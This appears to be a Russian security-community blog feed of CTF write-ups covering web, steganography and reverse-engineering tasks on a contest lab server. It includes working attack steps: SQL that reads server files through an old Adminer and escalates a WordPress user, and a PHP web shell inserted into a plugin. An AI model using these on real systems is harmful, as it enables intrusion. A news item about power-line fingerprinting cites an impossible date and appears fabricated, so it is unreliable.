DC78422 | DEFCON Ульяновск

Разбор заданий по вебу с DC78422 CTF0 (часьть 2 с кодревью)

Wed, 02 Aug 2023 00:00:05 +0000

Данное описание подготовлено и публикуется со слов победителя CTF этих заданий – Тальгата Хайруллова. Дальше текст передается as-is, правда иногда будут вставлять цитаты с пояснением зачем то или иное задание.

А ты точно девопс?

Задание отправляет нас изучать docker-compose.yml файл.

Первое, за что цепляется взгляд - секция с секретами. Дальше название самих сервисов website.production и website.staging и их описание не оставляет сомнений: на одном сервере бегут сразу и production и staging версия приложения с одними и теми же секретами. При этом staging версия запущена не в PRODUCTION режиме, как правило это, означает, что приложение будет более “открытым” и потенциально более уязвимым, что в итоге может привести к компрометации production версии.

жс

Задание встречает нас кусом кода на JavaScript и утверждением, что код дырявый. Беглый анализ кода подсказывает, что код написан под NodeJS, используется фреймворк express, в коде реализована некая проверка токена доступа, предполагаю, что в ней и есть основная проблема. Несмотря на то, что писать на express не приходилось, код кажется понятным и на первый взгляд выглядит хорошо.

Первая идея - что-то не так с middleware, возможно middleware с проверкой токена доступа отрабатывает позже чем обработка /api или вовсе не отрабатывает. Потребовалось чтение официальной документации, чтобы опровергнуть эту идею. Однако там же нахожу важную особенность express, оказывается, роутинг express по умолчанию регистроНЕзависимый, таким образом запросы вида /API, /Api, /aPi тоже должны обрабатываться. А вот это уже серьезная проблема для кода из задания, чтобы подтвердить наличие проблемы, остается убедиться, что метод startsWith регистрозависимый, иду в MDN:

String.prototype.startsWith() This method lets you determine whether or not a string begins with another string. This method is case-sensitive.

Итого: запросы вида /API, /Api, /aPi проходят мимо проверки токена доступа.

Разбор заданий по вебу с DC78422 CTF0 (часьть 1)

Wed, 02 Aug 2023 00:00:01 +0000

Данное описание подготовлено и публикуется со слов победителя CTF этих заданий – Тальгата Хайруллова. Дальше текст передается as-is, правда иногда будут вставлять цитаты с пояснением зачем то или иное задание.

Роботы

Первая мысль после прочтения задания - файл robots.txt. Проверяем: hxxp://91.240.84.252:31337/robots.txt

Бинго, флаг найден.

Это задание на самом деле часть изначальной разведки для будущих заданий. Файл robots.txt есть почти у всех сайтов и его использую чтобы что-то спрятать или что-то, ноборот показать поисковикам. И часто в этот файл попадает что-то что может быть чувствительным или раскрыть информацию об используемой системе. Например, во второй строке /wp-admin мы можем увидеть что тут используется скорее всего Wordpress, а от этого можно и “плясать дальше”

дамп

Бэкграунд в области web разработки, сразу же подсказывает мне следующие популярные имена файлов для дампа:

dump.(tgz|zip|sql|tar|tar.gz)
backup.(tgz|zip|sql|tar|tar.gz)

Проверяю вариант dump.sql: hxxp://91.240.84.252:31337/dump.sql

В ответ получаю файл с содержимым:

Флаг найден, переходим к следующему заданию.

Да, к сожалению, разработчики оставляют много файлов в корне проекта. Действительно, перебирать все имена файлов рукаами – дело не самое благородное. Поэтому можно воспользоваться готовыми списками имен файлов, содержащими частоиспользуесые имена, например, fuzz.txt и утилитой dirb для автоматизации перебора.

Без регистрации и смс

Задание предлагает нам попытаться скачать статический файл. Перехожу по ссылке из задания, на этот раз страница явно не на wordpress. В теле страницы ссылка на /static/welcome.txt. Исходя из задания нужный нам файл должен быть по адресу /flag.txt. Проверяю в лоб: hxxp://91.240.84.252:3000/flag.txt. В ответ, ожидаемо: 404 Not Found и информация о веб-сервере: nginx/1.25.1.

Пробую еще один вариант в лоб, вот так: /static/../flag.txt. hxxp://91.240.84.252:3000/static/../flag.txt и ответ, ожидаемо: 404 Not Found.

Поиск в google по версии nginx, подсказывает, что версия достаточно свежая, так что варианты связанные с уязвимостью в самом веб-сервере отбрасываю. Решил рассмотреть возможные варианты с ошибками конфигурации. Поиск привел меня на статью в блоге, где среди прочих ошибок была описана ошибка с недостаточно конфигурацией: Alias LFI Misconfiguration. Исходя из описания, нужно сформировать URL вот таким образом: /static../flag.txt.

Проверяю: hxxp://91.240.84.252:3000/static../flag.txt

Есть, флаг найден!

Кстати, вы можете проверить свою конфигурацию утилитой gixy от Яндекса на подобные проблемы мисконфигураций.

Тесты на проде

Последнее задание в секции web, намекает нам, что у разработчиков был доступ к проду и они наверняка там наследили. Опыт в web разработки на PHP сразу подсказывает проверить различные варианты:

/i.php
/info.php
/test.php
/phpmyadmin
/adminer
/adminer.php

Проверяю /info.php hxxp://91.240.84.252:31337/info.php

Разработчики забыли файл info.php, раскрывающий много информации о PHP и окружении в котором он запущен. По какой-то причине в первую очередь спешу посмотреть переменные окружения, кажется, что там может быть что-то интересное:

Но никаких секретов там нет(. Пробегаю глазами по всему phpinfo, попутно отмечаю для себя список расширений PHP, версии системных библиотек, пути к конфигам и текущему исполняемому файлу. Все примерно ожидаемое, за исключением /var/www/html/php.ini, файл конфигурации PHP лежит в корне сайта, это обязательно надо посмотреть: hxxp://91.240.84.252:31337/php.ini

К сожалению тут тоже ничего интересного.

Проверяю /adminer hxxp://91.240.84.252:31337/adminer.php

Adminer - это инструмент для управления БД через web. Разработчики любят его за простоту дистрибуции, достаточно положить один файлик в корень и все готово. Уже знаком с adminer и наслышан про проблемы с безопасностью, а тут еще сам интерфейс adminer кричит, о том, что это не самая свежая версия.

Поиск в интернете помогает освежить в памяти все CVE по adminer, среди которых есть CVE-2021-43008. Adminer до 4.6.3 дает возможность подключиться к удаленному серверу и разрешает выполнять запросы вида LOAD DATA Statement. Таким образом мы можем развернуть свой MySQL сервер, к которому выполним подключение через adminer и будем читать локальные файлы, звучит очень интригующе. Весь процесс развертки MySQL сервера описывать не буду, вот пару ключевых моментов:

Необходимо разрешить удаленные подключения к серверу. По умолчанию подключиться к серверу БД можно только из localhost.
Включить поддержку LOAD DATA LOCAL. Несмотря на то, что чтение файлы выполняется на клиенте, запрос не будет отрабатывать, если на сервере явно не включить поддержку.
Для задания пароля пользователя БД нужно использовать mysql_native_password метод, в противном случае adminer не сможет подключиться.

Все готово, пробую подключиться:

Отлично, подключение выполнено, не терпится что-нибудь прочитать с сервера. Для этого использую следующий SQL запрос:

DROP TABLE IF EXISTS mysql.test;
CREATE TABLE mysql.test (line TEXT);
LOAD DATA LOCAL INFILE '<path>' INTO TABLE mysql.test;
SELECT line FROM mysql.test;

Где <path> - путь к файлу. Пробую прочитать разное, например /etc/passwd, работает. Но пока нет понимания, что именно нужно прочитать, чтобы получить флаг.

Дальше помогает ранее изученный phpinfo(), который раскрывает путь до приложения и знание самого движка wordpress, настройки которого как правило лежат в файле wp-config.php:

Отсюда получаем доступы к БД приложения, подключаемся:

Поиск флага по данным в таблицах не дал результата. Решаюсь получить доступ к панели администратора wordpress, смотрю таблицу wp_users:

Мне не хотелось сильно следить, поэтому сначала рассматриваю варианты получить доступ без серьезных изменений в БД. Тут внимание притягивает md5 хеш пароля от пользователя CTF. Проверяю хеш через crackstation.net, получаю пароль: CTF.

Входим в админку: htxx://91.240.84.252:31337/wp-login.php

Видим интерфейс управления:

Поиски флага в интерфейсе тоже безуспешны. При этом стало понятно, что доступ у нас ограниченный. Опять же менять пароль пользователя admin мне хотелось, поэтому повысил доступы пользователя CTF через БД, для этого выполняю следующие SQL запросы:

DELETE FROM wp_usermeta WHERE user_id = 2;
REPLACE INTO wp_usermeta (user_id, meta_key, meta_value) (SELECT 2, meta_key, meta_value FROM wp_usermeta WHERE user_id = 1)

где:

user_id = 2 - пользователь CTF
user_id = 1- пользователь admin

Готово, заново логинимся, видим более продвинутый интерфейс:

Здесь мое внимание притягивает Edit Plugins. Это редактор кода плагинов, таким образом мы можем внедрить свой PHP код. Пробую внести изменения в файл akismet/akismet.php:

Редактор сходу подсказывает, что плагин akismet неактивен, так что видимо придется его позже еще и активировать. Добавляю следующий код:

if (isset($_REQUEST['__cmd'])) {
    exec($_REQUEST['__cmd'], $output);
    
    echo "<pre>";    
    print_r($output);
    echo "</pre>";
    die('done');
}

И активирую плагин. Теперь, если все правильно, запрос вида /?__cmd=ls -la /var/www/html, должен вернуть список файлов и директорий в /var/www/html. Проверяю: hxxp://91.240.84.252:31337/?__cmd=ls%20-la%20/var/www/html

Отлично, все работает. Мое внимание притягивает директория /test, которой тут не должно было быть. Смотрю что там: hxxp://91.240.84.252:31337/?__cmd=ls%20-la%20/var/www/html/test

Интересно, смотрю содержимое файла: hxxp://91.240.84.252:31337/?__cmd=cat%20/var/www/html/test/index.php

А вот и флаг.

Да директорию /test можно было прощупать еще на первом этапе, тоже типичное название для тестов на проде, в таком случае путь до флага был бы короче, его можно было прочитать через через LOAD DATA LOCAL в adminer.

Для исследования WordPress сайтов можете так же пользоваться утилитой WPScan. Она тоже может подсказать что прикольное.

Разбор заданий по стенографии с DC78422 CTF0

Tue, 25 Jul 2023 00:00:01 +0000

Данное описание подготовлено и публикуется со слов создателя этих заданий – Sergey Nord (@rottenmechanism). Дальше текст передается as-is.

1) Наше путешествие начинается с QR кода

переходим по нему и попадаем на https://telegra.ph/Wake-up-Neo-07-05

2) внимательно осмотрев страницу видим 2 пути:

Самый очевидный - перейти по ссылке под картинкой с кроликом на drive.google.com/file/d/1LVzPeTM4njooOSCJ5QqCSEZ-8e4v9rkz и второй менее очевидный - спрятанная ссылка на https://pastebin.com/84WBMkVg в нижнем подчёркивании после знака вопроса. Сначала пройдём по первому пути

3) Проходим на гугл диск и видим ту же картинку с кроликом, скачиваем её и начинаем анализировать

4)Открываем картинку текстовым редактором и в конце видим:

flag{F0llowTh3WhiteR4bbit} уу, первый флаг

А также продолжение в виде HEX кода

68 74 74 70 73 3A 2F 2F 74 69 6E 79 75 72 6C 2E 63 6F 6D 2F 79 65 36 37 34 61 38 38

5) Делаем преобразование HEX->ASCII и получаем https://tinyurl.com/ye674a88 ссылка ведёт на гугл диск с архивом, скачиваем и получаем Z1ON.rar

6) Архив запаролен, стандартные не подходят и брут не эффективен, пока что оставим его и порешаем второй путь

7)Переходим на pastebin и видим строку cGJieGE6Ly9rdGtzLnpjLzM0Y1o4VAo= очевидно это base64, декодируем и получаем pbbxa://ktks.zc/34cZ8T

8) Похоже на ссылку, но перепутаны буквы, воспользуемся шифром Цезаря ROT8 https://clck.ru/34uR8L

9) Ссылка ведёт на картинку на том же гугл диске, скачиваем её

10) Из названия файла получаем flag{TimeT0Tak3TheR3dPill} а на ней самой видим подсказку, что в случае необходимости нам нужно воспользоваться кодами доступа в Зион

11) Гуглим коды 0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 0, 1, 2, 3, 5, 8, 13, 21, 34, 55, 0, 1, 3, 4, 7, 11, 18, 29, 47, 76, 0, 1, 4, 5, 9, 14, 23, 37, 60, 97, 0, 1, 5, 6, 11, 17, 28, 45, 73, 118, 0, 1, 6, 7, 13, 20, 33, 53, 86, 139, 0, 1, 7, 8, 15, 23, 38, 61, 99, 160, 0, 1, 8, 9, 17, 26, 43, 69, 112, 181, 0, 1, 9, 10, 19, 29, 48, 77, 125, 202, 0, 1, 10, 11, 21, 32, 53, 85, 138, 223 которые представляют собой последовательность Фибоначчи и распаковываем архив Z1ON.rar

12)Получаем 1tp.png - это половинка qr кода, она горизанально отражена, на что намекают квадраты разметки и название файла, зеркалим.

13) У обычного человека возник бы закономерный вопрос: где вторая половинка, нужно бы её найти, но не у одного нашего героя, даже с большой буквы Героя - Избранного, NNeo, как мы его окрестили, он не стал искать вторую часть, а решил восстановить то что есть, но об этом в конце райтапа

14) Вспоминаем что у нас ещё есть картинка со вторым флагом и подсказкой к зиону, прогоняем её бинволком и видим, что она содержит в себе RAR архив

15) Меняем расширение на RAR и открываем. внутри вторая часть qr кода.

16) Соединяем части воедино и переходим на финальную страницу https://telegra.ph/Congratulation-that-is-all-07-05 с последним флагом flag{_M4trix_Has_Y0u_Neo_}

Готово, вы восхитительны!

Страница всячески намекает нам что на ней больше ничего нет, но особо пытливые в итоге найдут своё предназначение^^

Но знаете, есть избранный, который прошел этот квест по-своему и далее его цитата, а этим избранным был ~~Альберт Эйнштейн~~ участник, занявший 4 место в нашем CTF Victor Ryabinin

1) сначала прошел по qr

2) открыл ссылку под картинкой внизу (скрытую сначала не заметил)

3) скачал картинку, нашел через strings первый флаг и ссылку на архив

4) к архиву пробовал набрутить простые пароли, не получилось, фразы из фильма - тоже мимо, нашел пароль который вводила тринити в одной из частей Z10N0101, не прошло, загуглил коды доступа в зеон - прокатило, получил пнг - нижнюю часть картинки

5) смотрю -картинка обрезанная, “ага”, старый трюк с изменением высоты - поправил высоту до 1023, но нет, скрытой второй части не оказалось

6) ок, что если вся инфа в нижней части QR кода, а в верхней ничего нет? идем на https://merri.cx/qrazybox/, выбираем размер, начинаем рисовать - какая-то ерунда, большой и малый квадрат поменяны местами, ок, отражаем по вертикали, квадраты на месте, похоже на правду

7) черным и белым помечаем клетки которые известны, (то что версия 3 и L кодировка тоже выясняем походу, отмечая квадраты в правом верхнем углу, запускаем анализ

Error Correction log :
Show
Decoding Error :
Show
Back to editor
QR version : 3 (29x29)
Error correction level : L
Mask pattern : 3
Number of missing bytes (erasures) : 30 bytes (42.86%)
Data blocks :
["01000011","00110110","10000111","01000111","01000111","00000111","00110011","10100010","11110010","11110111","01000110","01010110","11000110","01010110","01110111","00100110","00010010","11100111","00000110","10000010","1111????","????????","????????","????????","????????","????????","????????","???00111","01010110","11000110","00010111","01000110","10010110","11110110","1110????","????????","????????","????????","????????","????????","????????","???10111","00110010","01010110","00010110","11000110","11001100","00110001","0000????","????????","????????","????????","????0000","11101100","00010001","???11011","00100100","00110000","10101000","11000000","100?????","????????","????????","???00001","11110001","10110100","010?????","????????","????????","???11110"]
----------------Block 1----------------
Reed-Solomon Block : [67,54,135,71,71,7,51,162,242,247,70,86,198,86,119,38,18,231,6,130,0,0,0,0,0,0,0,0,86,198,23,70,150,246,0,0,0,0,0,0,0,0,50,86,22,198,204,49,0,0,0,0,0,236,17,0,36,48,168,192,0,0,0,0,241,180,0,0,0,0]
Final data bits :
01000011001101101000011101000111010001110000011100110011101000101111001011110111010001100101011011000110010101100111011100100110000100101110011100000110100000100000000000000000000000000000000000000000000000000000000000000000010101101100011000010111010001101001011011110110000000000000000000000000000000000000000000000000000000000000000000110010010101100001011011000110110011000011000100000000000000000000000000000000000000001110110000010001
[0100] [00110011] [011010000110111010001101110100011011100000110111001100100111010001001011110010010111101101110100011011001010110110110001101100101011011001110110111001001101100001001001011100110111000001101101000001001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000101011011011000110110000101101110100011011010010110110111101101100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001100100100101011011000010110110110001101101100110110000110000001000000000000000000000000000000000000000000000000000]
Mode Indicator : 8-bit Mode (0100)
Character Count Indicator : 51
Decoded data : https://telegra.ph  latio` %allÃ 
Final Decoded string : https://telegra.ph  latio` %allÃ 
Error :
- Too much missing bits

получилось h??p??//te?????.ph/????????latio????????s-all-????? ок, ссылка похожа на https://telegra.ph/ в конце у них идет номер месяца и число статьи, т.е. https://telegra.ph/????????latio????????s-all-07-0[5-9] число от 07-05 (дата старта квеста до 07-09, когда был первый прошедший квест) далее идем на https://www.nayuki.io/page/creating-a-qr-code-step-by-step, генерируем qr код по известной части фразы, медленно и кропотливо переносим букву за буквой (буквы в qr кодах идут кривыми блоками)

8) запускаем анализатор, получаем https://telegra.ph/????????lation???????s-all-07-0? не сильно много это дало, возможно это опять фраза из фильма? качаем субтитры 4-х частей матрицы и грепаем по lation получили: simulation, congratulations, population, о, congratulations вроде как как раз подходит по маске, ок, предположим https://telegra.ph/congratulation???????s-all-07-0? поздравляем, это все? что, ж, звучит правдоподобно,

9) дальше чисто муки перебора вариантов

congratulations-thats-all, не подходит,
congratulations-that-is-all - не влазит, хмм, а что если не “поздравляем, это все”, а “поздравление, это все?”

проверяем congratulation-that-is-all и все даты, результат: https://telegra.ph/congratulation-that-is-all-07-05

10) закрались сомнения что именно так надо было проходить квест, пишем разрабам квеста и узнаем что оказывается была вторая часть qr кода в картинке для второго ключа, проверяем binwalk и находим архив, спрятанный в картинке с другой половиной QR кода

Разбор заданий по реверсу с DC78422 CTF0 (часть 3)

Mon, 24 Jul 2023 00:00:10 +0000

Данное описание подготовлено и публикуется со слов участника CTF, занявшего почетное второе место – Сементинова Сергея ( @cema_rus ). Мы разбили прохождение реверста на несколько статей потому что они достаточно обширны и подробны, первая часть разбором с заданиями Task1.exe, Task2.exe, Task3.exe, taskSyzran.exe уже доступна, как и вторая часть c Deep.exe, а это уже третья часть. Дальше текст передается as-is.

Final.exe

Финальное задание и самое интересное! Далее будут описаны только основные шаги решения, а тонны негодования, возникших проблем на разных этапах и различные поиски, я оставлю “за кадром”.

Собираем всё необходимое

Сразу же смотрим информацию в программе Detect-It-Easy и видим, что компилятор Embarcadero Delphi(XE7) - будем облегчать себе жизнь при помощи Interactive Delphi Reconstructor (https://github.com/crypto2011/IDR); Качаем, подкидываем ей все “базы знаний”, запускаем, открываем наш Final.exe и ждём, пока пройдёт анализ файла. После окончания анализа, в меню Tools выбираем пункт IDC Generator и сохраняем куда-нибудь скрипт Final.idc;

Запускаем IDA и открываем наш Final.exe, смотрим функцию start (ДО) и радуемся, что большую часть за нас всё сделает полученный выше скрипт. В меню File выбираем пункт Script File и открываем наш Final.idc и дожидаемся, пока скрипт все сделает - готово (ПОСЛЕ).

Анализ кода после декомпиляции

Функция EntryPoint

Запуск программы показал, что если флаг введен неправильно, то программа продолжает спрашивать флаг снова, пока не будет указан верный флаг. Возьмём это как некую отправную точку.

В конце главной функции видим вызов Halt0. С высокой долей вероятности - это будет завершение программы; из чего следует, что переменная byte_4E13C4 - означает что введенная строка оказалась верной. Назначаем ей имя bFlagIsOK и продолжаем распутывать этот клубок, попутно рассматривая условия, зависимости и прочие штуки, которые помогут нам понять алгоритм проверки.

Находим в каком месте в bFlagIsOK присваивается единица и какие условия для этого должны быть выполнены (помечаем) и, если верить логике, то в случае невыполнения условия говорим, что что-то пошло не так и уходим на очередной круг цикла (помечаем и это место).

При этом получаем метку, на которую ещё из 2х мест уходит наша программа, а значит и в этих местах проверка флага “не проходит”.

Изучая эти условия, мы понимаем, в какой переменной находится введенная нами строка и продолжаем анализ всех действий, которые с ней происходят. Далее я пропущу описание поиска всех значимых для алгоритма переменных, а просто покажу часть “причесанного” кода, по которому уже можно строить алгоритм проверки введенной строки.

Всё описанное и немного фантазии, дают нам следующий алгоритм для проверки строки:

Читаем строку из консоли;
Если строка начинается не с последовательности “flag”, уходим на метку lblFlagIsNotCorrect;
Если длина строки не равняется 26 символам, 4й символ (начиная с нулевого) не равен ‘{‘ или 25й символ не равен ‘}’ - уходим на метку lblFlagIsNotCorrect;
Для каждого символа в фигурных скобках формируем строку, в которой этот символ повторяется столько раз, какой он идёт по порядку от скобок; т.е. для введенной строки flag{12345.... Это будут строки: “1”, “22”, “333”, “4444”, “55555” и т.д.;
Идёт обработка двумя функциями sub_4D37DC, sub_4D372C и если результат их выполнения равен проверяемому символу, то увеличиваем счётчик;
Если, по окончании строки, счётчик равен 20 (количеству символов в скобках), то bFlagIsOK = 1, выводим радостное сообщение и выходим из программы.

В целом, картина уже довольно ясная, кроме 2х моментов - это функции sub_4D37DC и sub_4D372C.

Функция sub_4D37DC

Разбор этой функции почти превратился для меня в ад, но “голос свыше” обратил моё внимание, что цифры при заполнении массива в одной из функций внутри очень нарядно выглядят:

Поиск в гугле по этим цифрам, сказал что такие полиномы (если их можно так назвать) используются при расчёте хэша MD5 и SHA-1. Изучив подробнее, выясняем, что в SHA-1 используется еще 5й полином, а значит наш случай - это MD5. Переименовываем функцию и идём дальше)

Функция sub_4D372C

На вход ей отправляется результат расчёта MD5 хэша из функции выше и байт из некоторого массива, индекс которого соответствует индексу проверяемого символа (после скобок, естественно). Далее функция переводит бинарный код в HEX строку и результатом функции является символ, стоящий на определенной позиции из этой HEX-строки. Позиция соответствует значению переданного байта.

Итог

Заменяем в нашем алгоритме пункт 5 на пункты: 5.1. Расчет хэша MD5 для сформированной строки; 5.2. Формируем из бинарного кода HEX-строку; 5.3. Возвращаем n-й символ из строки (n зависит от значения байта в неком массиве);

Ну что ж… Общий алгоритм готов. Теперь берём в руки какой-нибудь язык программирования и пишем кейген) В нашем случае, это будет не совсем кейген, а программа, которая покажет все возможные символы для каждой из позиций в строке.

Делаем калькулятора флага

Первую реализацию калькулятора флага, сделал на C#. Всё, вроде, выглядело хорошо и должно было работать так же.

Но, как обычно, что-то пошло не так и для некоторых позиций не было ни одного подходящего по алгоритму значения.

Ломал голову и так, и эдак, и всё перепроверил по 100 раз, но результата никакого… Спустя какое-то время, когда я уже был готов жевать бумагу с заметками, выяснилось, что MD5 не такая уж MD5 как кажется на первый взгляд. Наиболее внимательные уже заметили, что полиномы для расчёта MD5 те же, но порядок у них другой.

Пришло время второй реализации, но… На чём её писать?! Ведь C# в чистом виде уже не подходит, реализации на нём в интернетах у меня вылетали с ошибкой. Из всего остального у меня установлено и имеется достаточный опыт только на чистом C под микроконтроллеры. Значит быть “железному” кейгену) Нашел реализацию MD5 для С, адаптировал её под микроконтроллер и написал кейен уже на выбранное железо.

Компилирую, загружаю в железяку, запускаю терминал и… Вот результат:

Долго мудрить не будем, составим флаг по первым символам в каждой позиции и проверяем сначала в программе, потом на сайте - Correct!

Ну и фото используемой железяки:

Задание выполнено!

Для себя могу отметить одно. Подобные “соревнования” очень сильно стимулируют к изучению чего-либо. И даже не наличием подарков, а просто турнирной таблицей. И хочется сказать СПАСИБО всем причастным к организации данного мероприятия. Было очень интересно!

Файлы заданий

https://dc78422.ru/files/ctf-tasks/0/Final.exe

Разбор заданий по реверсу с DC78422 CTF0 (часть 2)

Mon, 24 Jul 2023 00:00:05 +0000

Данное описание подготовлено и публикуется со слов участника CTF, занявшего почетное второе место – Сементинова Сергея ( @cema_rus ). Мы разбили прохождение реверста на несколько статей потому что они достаточно обширны и подробны, это уже вторая часть, первая часть разбором с заданиями Task1.exe, Task2.exe, Task3.exe, taskSyzran.exe уже доступна, как и третья часть разбора с финальным заланием Final.exe. Дальше текст передается as-is.

Deep.exe

Предпоследнее задание. Уже больше похожее на настоящий реверс, со всем плюшками в виде: разобрать код, понять алгоритм и сделать генератор ключей. Ну что) В добрый путь…

Сначала планировалось выполнять это задание с применением все тех же IDR и IDA, но в IDA при декомпиляции вылазила ошибка и, честно сказать, было лень с ней разбираться - было решено использовать “новый для себя” инструмент - Ghidra (https://github.com/NationalSecurityAgency/ghidra/releases).

Качаем, запускаем, создаем проект, добавляем приложение:

По двойному щелчку на приложении запускается окно CodeBrowser и, при первом запуске, предлагается провести анализ кода, соглашаемся на всё, жмём на кнопку Analyze и дожидаемся окончания анализа.

Теперь имеем код и давайте его разбирать, попутно переименовывая различные переменные и функции для удобного понимания:

Как обычно, начинаем с условия, когда флаг считается правильным. Переменная DAT_0040a800 должна, после всех вычислений, иметь значение равное 100. В самой функции не видно объявления этой переменной, только начальная инициализация. Скорее всего, эта переменная глобальная (в чём мы убедимся позже). Переименовываем и идём дальше.

При дальнейшем изучении понимаем, что функция FUN_00403eb4 возвращает длину строки, а переменная DAT_0040a798 - это введенный нами влаг. На и тело условия, при помощи логики и фантазии, приводим примерно к такому виду:

На этом этапе, уже у многих будет общее понимание алгоритма проверки. А за деталями пойдём по очереди в fInputCharLeft, fInputCharRight, fInputCharUp и fInputCharDown.

Все 4 функции выглядят примерно одинаково, они отличается битами, наличие которых проверяется в условии и значением, которое суммируется с нашим счетчиком.

Непонятным остаётся только один момент: Что это за условие такое в функциях?! Какое отношение оно имеет к введенному нами флагу?! Ерунда какая-то, которая заставила меня изрядно поломать голову… И, самые внимательные, уже обратили внимание на какую-то странную + 3 в условии.

Продолжаем смотреть другие функции, в надежде что придёт озарение и… Натыкаемся на это:

Некая функция с инициализацией некоего массива и, при детальном рассмотрении, видим, что наш массив сидит по адресу 0x0040a79c, а указатель на введенную нами строку по адресу 0x0040a798:

Немного поразмыслив, понимаем, что конструкция вида:

*(byte *)((int)&sInputFlag + iCheckingCounter + 3)

означает не обращение к нашей строке, а обращение к этому массиву, т.к. iCheckCounter не должен быть меньше 1, а общая сумма (0x0040a798 + 1 + 3 == 0x0040a79c) равна адресу нашего массива. В общем… Декомпилятор немного неправильно распознал конструкцию, но оттого стало только интереснее)

Что получаем в итоге? Алгоритм проверки флага:

При запуске iCheckCounter = 1;

Проверяем все входные условия, в виде фигурных скобок, длины и прочего;
Если символ из набора “направлений движения”, то проверяем содержимое элемента массива someArray[iCheckCounter - 1] (т.к. у нас индексация начинается с 0) и если установлен бит, соответствующий направлению, идём дальше.
Так двигаемся до тех пор, пока iCheckCounter не достигнет значения 100;

Алгоритм получили, давайте “накидаем” генератор флагов:

Ограничение на длину флага установил в 20 символов, мне показалось, что этого будет достаточно. Запускаем, смотрим результат:

Выбираем самый короткий, проверяем в программе и на сайте - Correct!

Файлы заданий

https://dc78422.ru/files/ctf-tasks/0/Deep.exe

Разбор заданий по реверсу с DC78422 CTF0 (часть 1)

Mon, 24 Jul 2023 00:00:01 +0000

Данное описание подготовлено и публикуется со слов участника CTF, занявшего почетное второе место – Сементинова Сергея ( @cema_rus ). Мы разбили прохождение реверста на несколько статей потому что они достаточно обширны и подробны, это первая, вот вторая часть c Deep.exe и третья c Final.exe. Дальше текст передается as-is.

Первыми шагами в этом деле стало решение маленькой кучки задач с одного из сайтов crackme, на котором рядовые пользователи пишут свои версии подобных задач и выкладывают для решения в массы. Но интерес там ничем не поддерживался и он угас после решения 3-4 задач. Но полученный опыт остался, а значит задания в рамках CTF можно считать уже вторым шагом в этом направлении.

Рассмотренные ниже задания были в разделе Реверс-Инжиниринг на прошедшем в июле 2023 года мероприятии CTF@dc78422.ru; Задача для каждого задания, как обычно, вычислить некую последовательность, которую программа приняла бы за “правильную”.

Первые четыре задания довольно простые, поэтому по ним я пробегусь очень кратко.

Task1.exe

Программа совершенно не хотела запускаться, постоянно ругалась на отсутствие тех или иных библиотек, поэтому было решено не париться, открыть его в Notepad++ и листать вниз, в надежде увидеть хоть что-то интересное. Каково же было моё удивление, когда примерно в середине файла нашлись строки в “чистом виде”:

К сожалению в программе проверить не получилось (она так и не запускалась), поэтому этот флаг сразу отправился в задание на сайте - Correct!

Task2.exe

У этой программы с запуском проблем уже не было. На фоне предыдущего “успеха”, сразу открываем в Notepad++ и ищем какие-нибудь строки. И снова “удача”:

Кто знает, что такое кодировка BASE64, тот в любом месте без особых проблем увидит закодированные данные и будет знать, что с ними делать. В нашем случае - один из плагинов Notepad++ декодирует эти данные, проверяем полученный флаг сначала в программе, потом на сайте - Correct!

Task3.exe

Тут уже пришлось поломать немного голову. Простое открытие файла и попытка что-то там найти, как в предыдущих двух заданиях, не дало результата. Попытка открыть файл в IDA - ошибки в процессе анализа. Пробуем открыть в Ghidra - тоже ничего хорошего. После некоторых блужданий и поиска информации, появляется мысль: посмотреть информацию о приложении. Собственно, с этого и надо было начинать любое задание - времени занимает не много, а результат может дать хороший. Смотрим:

И сразу всё становится ясно, что и где пошло не так) Теперь, главное - как его распаковать для дальнейшего изучения. Второй ссылкой поиска по запросу “upx windows” нашлись готовые релизы упаковщика. Качаем, распаковываем, смотрим справку и выполняем команду:

Ну и, по традиции, смотрим его в блокноте. Результат проверяем в программе, потом на сайте - Correct!

taskSyzran.exe

Ученые предыдущим опытом, сразу смотрим информацию о файле taskSyzran.exe и видим, что компилятор Embarcadero Delphi(XE7), а значит в помощь себе можно использовать программу Interactive Delphi Reconstructor (https://github.com/crypto2011/IDR). Что, куда и как - расскажу в последнем задании. Сейчас же просто скажу, что в результате получаем более читаемую декомпиляцию и начинаем ее изучать:

Даже не “причесывая” код, видно, что флаг будет считаться правильным, если результат выполнения sub_41A424(dword_423EBC) будет отличен от нуля. Идем смотреть и разбирать функцию. Я покажу уже разобранный вариант:

В 40й строке операция отрицания (~) эквивалентна операции XOR 0xFF, а значит наш флаг посимвольно XORится и сравнивается с неким массивом. Другими словами, если этот массив посимвольно заXORить с 0xFF, то мы получим наш флаг. Достаем массив:

И XORим его. Я использовал сервис XOR Calculator (https://xor.pw/):

Результат проверяем в программе, потом на сайте - Correct!

Файлы заданий

Деанон через бытовые сети электропитания

Fri, 01 Apr 2022 00:00:00 +0000

Исследовательская группа кафедры электротехники и компьютерных наук массачусетского технологического университета опубликовали исследование, посвященное фингерпринтингу электронных приборов, бытовых сетей электропитания. В нем описано, как определить нахождение любого устройства в сегменте сети, начиная от трансформаторной подстанции. А также определить фазу, к которой устройство подключено, что улучшает локализацию искомого устройства.

Метод основан на том, что блок питания типа flyback, которые установлены в 95% устройств, несмотря на идентичную топологию имеет многие индивидуальные параметры (такие как намотка импульсного трансформатора, ширина потенциального барьера в элементах обратной связи и прочие параметры), что дает строго индивидуальный частотный спектр устройства.

Проведя преобразование Фурье над функцией потребления тока фазой подстанции можно выделить картину спектра работающих на ней устройств и выделить из него искомый отпечаток спектра устройства. Так же, если использовать свёрточную нейросеть, можно выделить и подключенное к блоку питания устройство (например телефон, в случае если он стоит на зарядке), так как потребление устройства накладывает свой отпечаток поверх спектра блока питания.

Впрочем, в статье также отмечено, что старые устройства не поддаются подобному фингерпринтингу, поскольку в их цепях используются сетевые трансформаторы, которые эффективно фильтруют высокочастотные составляющие спектра устройств, запитанных от его вторичных обмоток.

Ссылка на оригинал исследования https://www.technologyreview.com/2022/03/32/1047819/flyback-fingerprint/

Новое сообщество DC в Ростове-на-Дону DC7863

Sat, 19 Sep 2020 00:00:00 +0000

Привет,

У в Ростове-на-Дону образовалось новое сообщество DС, а точнее DC7863. Ура!

__cha1ned, [Sep 10, 2020 at 7:05:31 PM]: Ну я запулил обращение во всех чатах ростова по поводу создания DC-шки

Если у вас есть знакомые из Ростова, поделитесь этой благой вестью, а подробности можно узнать у @__cha1ned

P.S. Мы вроде собрали всех сообщества и никого не забыли на странице https://dc20e6.ru/friends-and-communities/

